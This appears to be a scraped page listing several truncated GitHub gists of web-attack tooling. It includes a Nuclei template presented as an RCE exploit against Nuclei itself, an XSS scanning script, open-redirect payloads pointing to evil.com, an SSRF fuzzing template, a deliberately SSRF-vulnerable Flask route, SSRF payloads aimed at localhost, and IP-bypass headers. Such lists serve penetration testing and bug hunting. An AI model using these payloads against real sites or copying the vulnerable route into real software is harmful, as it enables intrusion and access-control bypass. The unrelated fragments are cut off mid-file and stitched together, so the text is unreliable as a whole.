@c3l3si4n
c3l3si4n / nuclei-rce.yaml
Last active December 27, 2024 09:13
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
id: nuclei-rce
info:
  name: Nuclei Template RCE by Chromium
  author: c3l3si4n
  severity: critical
  tags: rce,hackback
headless:
  - steps:
@R0X4R
R0X4R / inxss.sh
Last active April 21, 2025 05:54
A fast xss detector script
#!/bin/bash
#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
#Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
#Usage: ./inxss.sh testparams.txt target.tld
lists=$1
mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
mkdir -p $mkout
echo -e "Total $(cat $1 | wc -l) targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
Tracker
__gaTracker
_csrf_token
_ga
a
accept_latest_tos_url
access_level
active
admin
adrevenue
@KathanP19
KathanP19 / Open-Redirect-Payloads.txt
Last active April 15, 2024 18:41
Open Redirect Payloads from zseano methodology.
\/evil.com
%5c%2fevil.com
\/\/evil.com
%5c%2f%5c%2fevil.com
\\evil.com
%5c%5cevil.com
//evil.com
%2f%2fevil.com
//[email protected]
/\/evil.com
@ResistanceIsUseless
ResistanceIsUseless / Header-Injection.yaml
Last active December 30, 2024 07:50
Nuclei SSRF Fuzzing Template
id: header-injection
info:
  name: Header SSRF Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for OOB SSRF
  tags: fuzz,ssrf
requests:
@rollwagen
rollwagen / ssrf.py
Last active March 16, 2024 20:22
Minimal SSRF vulnerable python flask example application.
from flask import *
import requests
app = Flask(__name__)
@app.route('/follow')
def follow_url():
    url = request.args.get('url', '')
    if url:
        return (requests.get(url).text)
@rootsploit
rootsploit / SSRF-Payloads.txt
Created January 28, 2021 11:01
Combination of SSRF Payloads
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
http://localhost:80
http://localhost:443
http://localhost:22
https://127.0.0.1/
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
@kaimi-
kaimi- / gist:6b3c99538dce9e3d29ad647b325007c1
Last active August 14, 2025 16:26
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1